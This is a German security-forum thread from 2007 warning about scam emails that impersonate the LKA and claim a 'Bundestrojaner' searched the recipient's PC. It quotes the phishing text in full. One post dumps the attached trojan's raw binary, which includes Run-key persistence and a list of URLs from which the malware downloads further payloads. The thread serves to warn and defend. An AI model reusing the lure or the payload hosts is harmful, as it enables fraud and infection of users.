Zurck   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekmpfung

Plagegeister aller Art und deren Bekmpfung: Onlinedurchsuchung NR - Bundestrojaner

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwnschte Software zu deinstallieren bzw. zu lschen. Bitte schildere dein Problem so genau wie mglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 05.05.2007, 12:30   #1
Da GuRu
Administrator
/// technical service
 

Onlinedurchsuchung NR - Bundestrojaner - Ausrufezeichen

Onlinedurchsuchung NR - Bundestrojaner



Hallo,

neue Bundestrojaner-Mails im Umlauf:

Zitat:
Sehr geehrter Internetnutzer,

im Rahmen unserer stndigen automatisierten berprfung von sogenannten Tauschbrsen im Internet, wurde folgende IP-Adresse auf unserem System ermittelt.
IP: 81.149.105.158

Der Inhalt Ihres Rechners wurde als Beweismittel mittels den neuen Bundestrojaner sichergestellt.
Es wird umgehend Anzeige gegen Sie erstatten, da sich illegale Software, Filme und/oder Musikdateien auf Ihren System befinden. Durch die Nutzung sogenannter Tauschbrsen, stellen Sie diese auch anderen Nutzern zu Verfgung und verstoen somit gegen 249ff StGB.

Das vollstndige Protokoll Ihrer Online-Durchsuchung finden Sie im Anhang dieser Email.

Die Strafanzeige und die Mglichkeit zur Stellungnahme wird Ihnen in den nchsten Tagen schriftlich zugestellt.

Herbert Klein, Kriminaldirektor, LKA Rheinland-Pfalz
Am Sportfeld 9c, 55124 Mainz
Tel.: 06131 - 970738
Fax: 06131 - 970731
Mobil: 0171 - 7504699
Also wie immer: Lschen ! Anhang nicht ffnen !

grtzi
.daguru
__________________

Alt 06.05.2007, 15:47   #2
didi54
 
Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



Kann man gegen solche Idioten eigentlich nichts unternehmen?
__________________


Alt 09.05.2007, 14:17   #3
Bringer1
 
Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



Zitat:
Return-Path: <Sandy@nishikoi.com>
Delivery-Date: Wed, 09 May 2007 13:52:48 +0200
Received-SPF: none (mxeu15: 200.203.63.29 is neither permitted nor denied by domain of nishikoi.com) client-ip=200.203.63.29; envelope-from=Sandy@nishikoi.com; helo=gago.gonzaga.com.br;
Received: from [200.203.63.29] (helo=gago.gonzaga.com.br)
by xx.xxxxxx.de (node=mxeu15) with ESMTP (Nemesis),
id xxxxxxxxxxxxxxxxxxxx for xxxxxx@xxxxxx; Wed, 09 May 2007 13:52:48 +0200
Message-ID: <001801c79217$5b1d52e0$04fa68cc@IMPRESSAO>
From: "Herbert Klein" <Sandy@nishikoi.com>
To: "xxxxxxxx" <xxxxxxx@xxxxxxx.com>
Subject: Aktenzeichen [48458075]
Date: Wed, 9 May 2007 08:50:10 -0300
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0015_01C79217.5B1D52E0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Envelope-To: xxxxxxx@xxxxxxx.com
X-AntiVirus: checked by AntiVir MailGuard (Version: 7.0.1.35; AVE: 7.4.0.15; VDF: 6.38.1.115)

------=_NextPart_000_0015_01C79217.5B1D52E0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Sehr geehrter Internetnutzer, im Rahmen unserer st&auml;ndigen =
automatisierten &Uuml;berpr&uuml;fung von sogenannten Tauschb&ouml;rsen =
im Internet, wurde folgende IP-Adresse auf unserem System ermittelt.IP: =
81.146.194.198 Der Inhalt Ihres Rechners wurde als Beweismittel =
mittels den neuen Bundestrojaner sichergestellt. Es wird umgehend =
Anzeige gegen Sie erstatten, da sich illegale Software, Filme und/oder =
Musikdateien auf Ihren System befinden. Durch die Nutzung sogenannter =
Tauschb&ouml;rsen, stellen Sie diese auch anderen Nutzern zu =
Verf&uuml;gung und versto&szlig;en somit gegen &sect;&sect; 249ff StGB. =
Das vollst&auml;ndige Protokoll Ihrer Online-Durchsuchung finden Sie =
im Anhang dieser Email.Die Strafanzeige und die M&ouml;glichkeit zur =
Stellungnahme wird Ihnen in den n&auml;chsten Tagen schriftlich =
zugestellt. Herbert Klein, Kriminaldirektor, LKA Rheinland-PfalzAm =
Sportfeld 9c, 55124 MainzTel.: 06131 - 970738Fax: 06131 - 970731Mobil: =
0171 - 7504699Mail: Hcklein51@aol.com
------=_NextPart_000_0015_01C79217.5B1D52E0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3D=
iso-8859-1">
<META content=3D"MSHTML 6.00.2900.2180" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<p>Sehr geehrter Internetnutzer,<br>
<br>
im Rahmen unserer st&auml;ndigen automatisierten &Uuml;berpr&uuml;fung =
von sogenannten Tauschb&ouml;rsen im Internet, wurde folgende IP-Adresse =
auf unserem System ermittelt.</p>
<p><strong>IP: 81.155.135.106</strong><br>
<br>

Der Inhalt Ihres Rechners wurde als Beweismittel mittels den neuen =
Bundestrojaner sichergestellt.<br>
Es wird umgehend Anzeige gegen Sie erstatten, da sich illegale =
Software, Filme und/oder Musikdateien auf Ihren System befinden. Durch =
die Nutzung sogenannter Tauschb&ouml;rsen, stellen Sie diese auch =
anderen Nutzern zu Verf&uuml;gung und versto&szlig;en somit gegen =
&sect;&sect; 249ff StGB.<br>
<br>
<strong>Das vollst&auml;ndige Protokoll Ihrer Online-Durchsuchung =
finden Sie im Anhang dieser Email.</strong><br>

<br>
Die Strafanzeige und die M&ouml;glichkeit zur Stellungnahme wird Ihnen =
in den n&auml;chsten Tagen schriftlich zugestellt.<br>
<br>
<span class=3D"normal">Herbert Klein, Kriminaldirektor, LKA =
Rheinland-Pfalz<br>
Am Sportfeld 9c, 55124 Mainz<br>
Tel.: 06131 - 970738<br>
Fax: 06131 - 970731<br>
Mobil: 0171 - 7504699<br>

Mail: <a class=3D"link" target=3D"_blank" href=3D=
"mailto:Hcklein51@aol.com">Hcklein51@aol.com</a></span></p>
</BODY></HTML>

------=_NextPart_000_0015_01C79217.5B1D52E0
Content-Type: text/plain; charset="us-ascii"; format=flowed

The attachment contained a virus or unwanted program and has been deleted. NR-[48458075].zip

------=_NextPart_000_0015_01C79217.5B1D52E0

------=_NextPart_000_0015_01C79217.5B1D52E0--

Isat schon echt spassig mit was die versuchen einen zu bekommen....
Nur Idioten fallen auf sowas rein!
__________________

Alt 09.05.2007, 17:16   #4
Auermensch
 
Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



Juhuuu, hab diese Post von Herrn Klein jetzt auch bekommen!

Aber das Lustige dabei ist, ich habe kein einziges illegal erworbenes File auf dem Rechner

Was ich benutze, bezahle ich auch...

Naja, soll dieser Herr Klein weitersuchen.
Ein Anhang war brigens bei mir nicht dabei!


Auermensch

Alt 10.05.2007, 21:09   #5
Sillevio
 
Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



Moin..
Ma ne Frage is das n echter Durchlauf von dem BKA??


Alt 10.05.2007, 21:41   #6
Auermensch
 
Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



Ne, ist ein Virus. Hat wohl irgendein Scherzkeks in Umlauf gebracht. Das Gesetz zu Onlinedurchsuchungen ist noch gar nicht durch, weil dazu die Verfassung gendert werden muss und die SPD ist dagegen und hat die nderung der Verfassung bisher abgelehnt. Also keine Panik

Allerdings wei man ja nicht, was die schon alles heimlich gemacht haben...


Auermensch

Alt 11.05.2007, 09:33   #7
Bommel1985
 
Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



hm, das ist so leider nciht ganz Richtig, die bundesregierung hat vor etwa einem Monat ffentlich zugegeben, dass sie private Rechner durchstbert hat und so an diverse Daten gelangt ist.

Hab die Nachricht im brigen auch schon erhalten, allerdings ebenfalls ohne Anhang. Naja, durch das, das ich in einem IT-Sicherheitsunternehmen ttig bin, verwende ich weder illegale Software, noch wrd ich auf solche sachen reinfallen. Aber lustig ist es schon irgendwie, wenn wir zu unseren Kunden gehn und die dann stur und steif behaupten, dass sie nichts gemacht htten und dann aber tausen file-sharer drauf haben und wei der geier was alles im Verlauf zu finden ist oder auch in den Temp-Dateien...

Alt 11.05.2007, 10:05   #8
Auermensch
 
Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



Also ich gebe zu, ich habe frher auch vieles in Tauschbrsen gezogen... wie es viele gemacht haben und auch heute noch machen. Aber ich musste dann auch die Konsequenzen tragen, als dann irgendwann im Februar 2006 die Polizei geklingelt hat, zwecks einer Hausdurchsuchung.

Den Rechner war ich los, musste mir einen Anwalt nehmen, dieser hat es dann zwar geschafft, dass der Staatsanwalt das Strafverfahren einstellt, aber nur unter der Bedingung, dass ich meinen PC nicht mehr zurck bekomme. Dazu musste ich 600 Anwaltskosten zahlen... hatte noch Glck gehabt.

Aber ok, war meine eigene Schuld, habe gezockt und verloren. Nur habe ich daraus gelernt, ich habe nun einen neuen PC und kein einziges illegales Programm mehr, habe extra bei der Bank einen Kleinkredit von 2.500 aufgenommen, weil ich als Mediengestalter auch Programme wie Photoshop brauche. Damit habe ich alles bezahlt, selbst die kleinen Sachen wie WinZip... Musik lade ich nur noch bei iTunes.

Also ich habe fr meine "Straftat" gebt und werde sowas nie wieder machen, darum habe ich auch nichts zu befrchten, bei mir wrden die nichts illegales mehr finden.

Aus Fehlern lernt man... vor allem wenn einem das Heiligste, der PC, weggenommen wird. Ich habe auch keine Tauschbrsen mehr installiert, will mit sowas nix mehr zu tun haben.


Auermensch

Alt 12.05.2007, 02:34   #9
DrSaddyFM
 
Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



Also Inhalt des Wurms / Virus ist:

___________________________________________

MZ   @  !L!This program cannot be run in DOS mode.$ Y,BBBQBLBHBIBFBCBBBDBRichB PE L CF   6  8  ` @            < x    .text @1  2  .text1  P  6 `.data1 8 `  : @ .rsrc   N @ @ A @ @ A @ @ &@ ? .@ B@ ? ? ? ? ? Y   Z a     !  \ *  j Q  ! 9 1 /  A  H       @ q K R   Z 
  
\ O A R c        J 
   W   3        ( ? z? j? Z? F? :? *? ? ?
? ? > > > > 4A > > > > ? @ @ @ p@ b@ @ :@ 1@ 1@  y7@ 78@ 8@ 8@ :@ :@ UjhP@ d Pd% e}܉u]E ;@ 3E~h;@ UMS" E uu@ 3ۅE M! uE;@ @E;|EM! EPR;@ ! EM! }܋u]Md
Ujh.P@ d Pd% e}܉u]E ;@ 3E~c;@ UMSC! E uu@ 3ۅE M! tEjP;@ ! E@;;@ E|EM }܋u]Md
Ujh@ d Pd% He}u]Mhm@ E hm@ hm@ M hm@ M E hm@ hm@ M{ Mj/w }#E ME EM6  MM E Mh 3PPPjP7 E E E MjZ3PPRR]3 E 2ˆU0]SV`q 3ۋŰB~M̃RS U;Z|EtzuR@ t_MPTE M E E M E M> E M/ EM   2E W̍EP Y2EMu7 ŰJY;~ 3E;@ ~^;@ UMS E uu@ 3ۅE M uEE;;@ |2EEu
EPYMEPR`MPTE E E Mi E M E M  EM jX}u]Md
E E M E M E M EM aM Mt tjPs@ E E M E MZ E MK EM< }u]3>d@  UjhO@ d Pd% 8e}u]čMhm@  E E E U܍EP3ɉMRQh?  QQQuh  @ uE؅tP @ E E܉E؋EuzE M3ۉ]UEPRQShm@ u@ E؅tP @ E 3]E tP @ E EM& Ë]ċMd
ËUE؉EȉU̍M̾m@ uj[SQSj Vu@ E؅tP @ E 3E tP @ E EM* u]3낸`e@ w UjhP@ d Pd% 0e}ĉuȉ]̍M E Mj h! 5;@   EԍMjj P0;@ 3EЅ~l;@ UЍMS
 E hm@ UEPRT E uMH E M E M E@;;@ E|M EM }ċuȋ]̋Md
ÐUjhd@ d Pd% ,e}ȉủ]hm@ 5;@ @ t
P@ Y]3Md
jj ;@  Mj 5;@  E M+ E MԍEPr t+Ex~EWP dYMԍEPG uՍM# E M EM  }ȋű]jXNe@ b UjhR@ d Pd% D N e}u]Mj/h E}}u]3Md
Í~h 3PPPjP= E h;@ ~ E E~P E E썍~@Pj Q ~~PE ~~P9 Dž~ E ~jZ3PPRR]3 ~ ~h" ~ E ~P8j Y; ~ ~PTDž~ ~H ~8@ E ~ E E ~ E ~ E~ jX}u]ie@ t ~~h PR<t.~~PR ~~h PR<uҍ~ ~ =  v22ۍ~ ~RTDž~ ~7 uE ~ :@ uhm@ <@ hm@ P4@ :@ j
~hm@ ~hm@ j Ѓ TE ~* E E ~o E ~] E~ VYE ~ E E ~ E ~ E~2 :E E ~ E ~ E~ g~ ~t tjPm@ E E ~l E ~Z E~ UjhQ@ d Pd% <e}u]3
;@ E3҅ɉUV uЋ;@ M36<EWE؉U E E܃x~n;@ U̍MPS E E hn@ M Eȡ;@ U̍MPS E E EMȋPZ;u222EEԅtMJ E E؅tM4 EM% ta;@ U̍MPS E EP{؃EM tjXE0;@ UW̍PS *YMЋE@;;@ EEċ}u]Md
ÐUjhTQ@ d Pd% 4e}uĉ]3;@ Eԅ? uԋ;@ M36<EWE܉U+ E Ex~n;@ UЍMPS E E hn@ M: E̡;@ UЍMPS E E EM̋PZ;t222EE؅tM E E܅tM EMv tK;@ UЍMPSX E EPx؃EM: tt@;;@ E}uċ]3Md
UjhJR@ d Pd% xe|u];@ jj 8 hm@ 5;@ @ t
P@ YE j!xYh n@ 5;@ ;@ 8 h8n@ 5;@ ;@ # h`n@ 5;@ ;@  hn@ 5;@ ;@  hn@ 5;@ ;@  hn@ 5;@ ;@  hn@ 5;@ ;@  ho@ 5;@ ;@  hLo@ 5;@ ;@  hpo@ 5;@ ;@ { ,E Mh o@  E MEj
PS E MEP E Mw Ex u3Ҹo@ RPPR@ E MK EE Mho@ B E MEj
P E MEP E M Ex u3Ҹo@ RPPR@ E M EE Mho@  E MEj
PW E
MEP E M{ Ex u3Ҹp@ RPPR@ E MO EE M h p@ F E
M Ej
P E M EP E
M E x u3Ҹ,p@ RPPR@ E M  EE MhDp@  E MEj
P[ E MEP E M Ex u3Ҹdp@ RPPR@ E MS EE Mhp@ J E MEj
P E MEP  E M Ex u3Ҹ p@ RPPR@ E M
EE Mhp@
E MEj
P_ E MEP" E M
Ex u3Ҹp@ RPPR@ E MW
EE Mhp@ N
E MEj
P
E MEP
E M
Ex u3Ҹp@ RPPR@ E M EE Mhp@ E! MȍEj
Pc
E" MȍEP&
E! M Eȁx u3Ҹq@ RPPR@ E M[ EE$ Mh,q@ R E% MЍEj
P E& MЍEP E% M EЁx u3ҸHq@ RPPR@ E$ M EE( Mh`q@ E) M؍Ej
Pg E* M؍EP* E) M E؁x u3Ҹpq@ RPPR@ E( M_ EE, Mhq@ V E- MEj
P E. MEP E- M
Ex u3Ҹq@ RPPR@ E, M
EE0 Mhq@
E1 MEj
Pk E2 MEP. E1 M
Ex u3Ҹq@ RPPR@ E0 Mc
E|u]Md
3PPho@
*@ 3PPho@
*@ 3PPho@
)@ 3PPho@
)@ 3PPho@
(@ 3PPho@
(@ 3PPho@ y
'@ 3PPho@ e
$'@ 3PPho@ Q
&@ 3PPho@ =
(&@ 3PPho@ )
%@ 3PPho@ 
,%@ 3PPho@ 
$@ ÐUjhR@ d Pd%  e}u]h @ H a@ jAY󥍅Hh P,@ HP;@ hq@ ;@ L `@  QYt Lh Rp @ LP;@ B ;@ J hq@ h;@ PP E PP;@  EP2 hq@ h;@ ;@ E썕TRn E Ej TP0@ ET DžX E Dž\ E `dP3ɉ`RQh?  QQQh r@ h  @ u)\3tR @ Dž\ `\u'hq@ @ @Phq@ jj h0r@ \@ E \tP @ Dž\ XtP @ DžX hDh  E h3@ h$4@ j2j P E E h+ jh@w @ 쐐Ujhc/@ d Pd% e}܉u]MEEE E 81~1E M B EM3 ]3Md
M  M uM QC |D>| Ƌu <t  LEPN E M  EM  }܋u]jXa k@ c S3C CCC u3[ËC tjX[3PPPPShp1@  WVUSVj]D$tFu
3Y[]^_  F 3~@ ;^uG;|΍$RS@ $;Vu
^L F뮐3ÐUjh^0@ d Pd% e}u]3Md
ÐPk@ h UjhR@ d Pd%  e}؉u܉]AAM3҉EU썽@b@ j}YUM3PPRq@ E Ѝh PR@ M̍P
 E U썅h PR@ ẼP L$P EMD$EM _}؋u܋]Md
ÐVt$Fu1j@ j 'vF FFt3^Ð;@ X h2@  Y;@ C h2@  Y;@ . h2@  Yj :@  :@ l@ h82@  Y;@  h,2@  YÐ;@  ÐUjhR@ d Pd% e}u]E:@ E E:@ p ]Md
Ð;@ X Ð;@ L Ð;@ @ Ðdd@ Ð@ ÐUE tP @ E ]ÐUjhS@ d Pd% e}܉u]ME E E EPUE E h3@ EPj2j R M ]Md
ÐUjh2S@ d Pd% e}u]ME Eh3@ EPj2j R ]Md
UjhRS@ d Pd% e}u]ME E E EH M ]Md
ÐUjhfS@ d Pd% e}u]M E EH EE]Md
Ð ÐUjhzS@ d Pd% e}܉u]MME E& E t
EP Y]Md
 %@ %|@ %x@ %t@ %p@ %l@ %h@ %d@ %`@ %\@ %X@ %T@ %P@ %L@ %H@ %D@ %@@ %<@ %8@ %4@ %0@ %@ %D@ %H@ %L@ %P@ %T@ %X@ %\@ %`@ %d@ %h@ %l@ %p@ %t@ %x@ %|@ %@ %@ %@ %@ %@ %@ %@ % @ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ % @ %@ %@ % @ %@ %@ %@ %@ % @ %$@ %(@ %,@ %@ Q=  L$r  -  =  s+ȋą@PUjh8@ h":@ d Pd% SVW3EEEE;E}uUu uEE M Md
_^[ } uuuu u Ã=;@ u t$@ Yh;@ h;@ t$ o t$YHUjhH@ h":@ d Pd% SVWe u EEe Mx )uMUE M Md
_^[ } uuuu u UjhX@ h":@ d Pd% QQSVWee MxM+M MUu YËeMMd
_^[ D$ 8csmt3k Ujhh@ h":@ d Pd% hSVWe3ۉ]j@ Y
;@
;@ @
:@ @
:@ @ ;@ # 90@ u hR:@  @ Y h@ h@ :@ EEP5:@ EPEPE P@ h@ h@ * $@ 0u>"u:Fu:t<"u>"uFu:t< v]ЍEP(@ EtE> vFuj
XPVSS$@ Pe EP@ E MPQ" YYËeu@ %@ %@ %@ %@ %@ h  h   YY3%@ t$t$t$t$C  KL$T$ɈH@ u j@ YjX h  j :@ %@ < |> D > >  < T@  `> @  x< &A  A @ @ A @ @ &@ ? .@ B@ ? ? ? ? ? Y   Z a     !  \ *  j Q  ! 9 1 /  A  H       @ q K R   Z 
  
\ O A R c        J 
   W   3        ( ? z? j? Z? F? :? *? ? ?
? ? > > > > 4A > > > > ? @ @ @ p@ b@ @ MFC42.DLL Y_mbscmp I __CxxFrameHandler Wfopen Lfclose MSVCRT.dll _except_handler3 U __dllonexit _onexit . ?terminate@@YAXXZ _exit H _XcptFilter Iexit _acmdln X __getmainargs _initterm __setusermatherr _adjust_fdiv j __p__commode o __p__fmode __set_app_type _controlfp W DeleteFileA LoadLibraryA >GetProcAddress ( CopyFileA YGetSystemDirectoryA $GetModuleFileNameA SleepEx lstrlenA Sleep &GetModuleHandleA PGetStartupInfoA KERNEL32.dll MessageBoxA bGetWindowThreadProcessId GetForegroundWindow GetClassNameA FindWindowExA ^GetWindowTextA USER32.dll RegSetValueExA {RegQueryValueExA _RegCreateKeyExA [RegCloseKey ADVAPI32.dll _setmbcp MÍMød@ MÍMød@ MÍMÍMÍMÍMÐMTÍMyÐMnÍMeÍMÐe@ .MFÍMÐ~/Í~#Í~Í~MÃ}uMÃ}uMÍMÍMøpf@ }uMÃ}uMÍMÍMøf@ rMÍMÍMxÍMoÍMfÍM ]ÍMTÍMKÍMBÍM9ÍM0ÍM'ÍMÍMÍM ÍMÍMÍMÍMÍMÍMÍMÍMÍMÍMÍMø g@ |TÍXYÍ\MËDoÍhQÍPWø j@ *M BÍM9ÐM.Ðk@ MÐk@ EHuh3@ EPj2j RËMÐk@ h3@ EPj2j Røl@ EHËMÐ0l@ tMÐ`l@ `MvÐl@ L  F F 5@ 2@ 4d@ d  d@ P@ P@  d@ %P@ P@  e@  8e@ \P@ 8P@  AP@  JP@   SP@      Le@ U@  e@ qP@ hP@  e@ P@ |P@  P@  e@ *P@ P@  f@  Hf@ P@ P@  P@   P@      \f@ I@  f@ Q@ P@  P@ Q@  f@ KQ@ $Q@  3Q@ BQ@ 4 g@
h@ AR@  `Q@  iQ@  rQ@  {Q@ Q@ Q@
Q@  Q@  Q@  Q@  Q@  Q@  Q@  Q@  Q@ Q@ ! Q@ $ Q@ % R@ ( R@ ) R@ , R@ - &R@ 0 /R@ 1 8R@    i@     i@ 
 i@    i@     j@     j@     $j@     4j@ " #  Dj@ $ & '  Tj@ ( * +  dj@ , . /  tj@ 0 2 3  j@ +@ +@ {+@ g+@ S+@ ?+@ ++@ +@ +@ *@ *@ *@ *@  j@ R@ TR@ `R@  lR@  xR@  R@     @k@ R@ R@  pk@  k@ R@  k@ R@  k@ S@ R@ R@  (l@ S@  Pl@ HS@ <S@  l@ \S@  l@ pS@ 5@ 4@ 4@ 4@ 4@ 6@ 6@ 6@ 6@ 6@ 6@ $6@ 2@ *6@ 06@ 66@ <6@ B6@ H6@ N6@ T6@ Z6@ +@ `6@ f6@ l6@ r6@ x6@ ~6@ 6@ 6@ 6@ 6@ 6@ 6@ 6@ 6@ 6@ 6@ 6@ 6@ r [&&&z&&&l&&s] & .))))t))x)))t ) software\microsoft\windows\currentversion TTT
shell32 ShellExecuteA open .exe http://flusentiere.de/images/counter/11.txt http://www.renatekoch.com/html/441.txt http://www.berkili-maschinen.de/img/log.txt http://adolf-seeger.de/rs/images/i.txt http://thaibaa.org/files/i.txt http://thaifisherfolk.com/Doc/i.txt http://alsiroyal.de/img/suche/i.txt http://ganzheitliche-kurse.de/RUBRIKEN/i.txt http://213.8.195.68/images/t.txt http://festivalgastronomico.com.br/images/0.txt cndrnndlkkffhqjhscfrpjbokmjsne this success. wefwe jrpsoij Accomplishments are of ehofchl greatest value when skbdffspsn advancing our progress mhcbsroldkkoekpeefjrsrgbdcmq toward the institutions nrildihdelffgrbeooerrjmodis goals. Further, gqefjphcigodbjkgijeghddbsr accomplishments are joldkkels not knsnhmnipsrjpprdlisf solely the result of one rcpjkffqcegjhkomnegcsrg persons efforts, but ejlhseeoipm rather the result iklqelsefogimkjqlbgfnp of support that the ifnsrohfifi individual receives from \ drivers\c656.tx isxa.exe SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN isxa   (  @  X   p              4 V S _ V E R S I O N _ I N F O       ?      S t r i n g F i l e I n f o \  0 4 1 9 0 4 b 0   C o m m e n t s 0   C o m p a n y N a m e c o m p a n y 4   F i l e D e s c r i p t i o n z u l u s 6  F i l e V e r s i o n 1 , 0 , 0 , 1 ,   I n t e r n a l N a m e z u l u s F   L e g a l C o p y r i g h t C o p y r i g h t 2 0 0 7 (  L e g a l T r a d e m a r k s <
 O r i g i n a l F i l e n a m e z u l u s . e x e  P r i v a t e B u i l d <   P r o d u c t N a m e c o m p a n y z u l u s :  P r o d u c t V e r s i o n 1 , 0 , 0 , 1  S p e c i a l B u i l d D  V a r F i l e I n f o $  T r a n s l a t i o n ( @    wwwwwwwwwwww wwwwwwwwwwwwwwppp pp pp pp pp pp pp pp pp pp pp pp pp pp pp pp pp pp pp pp pp pwwwwwwwwwwwwwxpp    ?          ___________________________________________________________

Fr all die es Interessiert !!!
Interessant sind die Domains (( llwech ))

Alt 15.05.2007, 10:52   #10
k3y
 
Onlinedurchsuchung NR - Bundestrojaner - Reden

Onlinedurchsuchung NR - Bundestrojaner



Man kann sich auch ganz einfach denken, dass dies keine echte Mail sein kann. Glaubt ihr wenn man euch beim benutzen illegaler Software erwischt, schreibt euch das LKA eine eMail mit dem Inhalt das ihr erwischt wurdet? muhahaha!
Und das in der eMail eure IP steht ist ein ganz einfaches HTML script. Weil selbst wenn sie eure IP irgendwie in die Finger bekommen und euren PC durchsuchen wrend ihr zB. illegale Software tauscht\bekommt\weitergebt wissen sie dadurch ja nicht automatisch eure eMail Adresse.

Und ausserdem finde ich diesen Hausdurchsuchungskrampf irgendwie Unsinnig. Wenn man wirklich was gegen illegalen Softwarehandel unternehmen wollte, sollte man eventuell zu allererst einfach mal diese Filesharing Programme verbieten.

Gendert von k3y (15.05.2007 um 10:59 Uhr)

Alt 18.05.2007, 08:44   #11
Norman
 
Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



Und wenn das LKA berhaupt und irgendwann so etwas machen wrde, dann wrden sie keine E-Mail schreiben, sondern einen guten alten Brief verwenden .

Alt 09.06.2007, 15:45   #12
Steiner99
 
Onlinedurchsuchung NR - Bundestrojaner - Icon17

Onlinedurchsuchung NR - Bundestrojaner



@Auermensch , schlimm wenn dir der PC weggenommen wurde,
aber Dateien per Emule und co runterzuladen gilt so die Inhalte nicht "legal" sind als Vergehen und nicht als Straftat, du whrest also solange du nicht selbst anbietest ein "Vergeher" und nicht ein "Straftter" der Staat wird bei solchen Sachen in der Regel nur auf Anzeigen hin aktiv und stellt so etwas in der Regel auch ein, da es Millionen sind, die sich als "downloader" bettigen und so etwas als Bagatelle gilt.

Der PC wird dann auch nur bei Strafverfahren zwecks Beweisicherung eingezogen, dann aber in vielen Fllen von den Ermittlungsbehrden weiterverwendet um zum einen abschreckend zu wirken. Zum anderen den Ermittlungsbehrden eine gute PC Ausstattung zukommen zu lassen ohne das Steuersckel all zu sehr zu belasten.

Da du aber mit Straftter und Vergeher so einiges durcheinander bringst.. knnte es hier nicht sein das du den Lobbiisten der Filmwirtschaft auf den Leim gegangen bist : Die immer Propagieren Raubkopierer sind Verbrecher? ;-) oder war das nicht alles was bei dir stattfand? Z.B. Gewerbsmiges anbieten von Raubkopierter Orginalsoftware oder Pornographische Inhalte von hchst Illegalem Inhalt? Den die "grnweimotorsport" Abteilung kommt net fr Gelegenheitsraubkopierer.

Gru Steiner

Alt 26.06.2007, 21:15   #13
fakeraol
 
Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



Zitat:
Zitat von k3y Beitrag anzeigen
Wenn man wirklich was gegen illegalen Softwarehandel unternehmen wollte, sollte man eventuell zu allererst einfach mal diese Filesharing Programme verbieten.
richtisch!!! :aplaus:
damit werden zwar auch jede menge filme, musik und programme legal verbreitet, aber wo wir schon mal dabei sind:
pc's werden auch zum illegalen verbreiten von sowas benutzt, also verbieten wir doch zu allererst einfach mal diese pc's :aplaus:

Alt 05.07.2007, 11:37   #14
Huhn
 
Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



also fr mich gibt es in diesem "konflikt" nur zwei logische lsungen:

1. Die Musikindustrie sollte ihre kapitalistische einstellung Grndlich berdenken, ich bin selbst musiker und kann nachvollziehen dass es selbstverstndlich nett is wenn man geld dafr bekommt, das zu tun was einem am meisten spa macht, bzw. machen sollte, andererseits ist es doch wesentlich intelligenter sich zu sagen " okaay, ich mache meine musik, und verbreite sie um meine gefhle in meiner musik zu verbreiten und unter der menscheit zu teilen" weils natrlich bei jedem menschen individuell ist, was an musik rauskommt wenn man den umgang mit nem instrument oder der eigenen stimme erlernt hat, und man jederzeit auf alle mglichen arten und weisen auf jedes genre und jeden musikstil zugriff hat, und sich somit weiter entwickeln kann und seine eigene musik verbessern kann was die ganze geschichte selbstverstndlich antreibt..geld fr software entwicklung kann ich da eher latzen, auch wenn die meiste software fr einen "guten zweck" durchaus umsonst angeboten werden knnte, beispielsweise antivirensoftware.

2. man verbietet die nutzung des internets komplett, weil man auf unglaublich viele verschiedene wege musik und software im internet verbreiten kann, das fngt da an dass man komplette alben beispielsweise im bit torrent netzwerk anbietet, und aufhren tut's da, dass man sich tabulaturen oder noten diverser lieder in stinknormalen textdateien verschickt..
Fragwrdig ist auch, was passieren wrde wenn man sich ein album gekauft hat, und dieses dann per mikrofon von der eigenen stereoanlage auf den pc aufgenommen wird, und diese files dann verschickt, weil teilweise ist dann der inhalt der datei zwar die musik die unter copyright steht, andererseits wrde die datei ansich unter dem copyright von sich selbst stehen...sehr verwirrend.
wie auch immer, das gleiche gibts natrlich auch bei software.
emule bittorrent, blabla, weiter gehts ber iranische raupkopie-dvd sammlungen auf denen es eigentlich alles mgliche gibt, und der versand von sourcecode, mal wieder per stinknormaler textdatei.

ok, da punkt 1 niemals in kraft treten wird weil wir auf einem kapitalistischen planeten leben, und geld in der heutigen gesellschaft mehr wert ist als alles was man sich vorstellen kann addiert, kommt eigentlich nur noch punkt 2 in frage, welcher vermutlich offiziell irgendwann in kraft treten wird, womit wir bei einem der grundprobleme der heutigen zeit angelangt sind. korruption.
wrde man das internet verbieten, bzw. den zugriff darauf weltweit offiziell verbieten, was wrde da wohl passieren? ob der gesamte planet wohl aufhren wrde zu surfen? nein, natrlich nicht. die jenigen, die genug geld oder "macht" haben, werden diesen luxus selbstverstndlich weiter haben, kapitalismus..eben..

__________________
Mein System

Alt 17.07.2007, 23:38   #15
terayaki
Gast
 
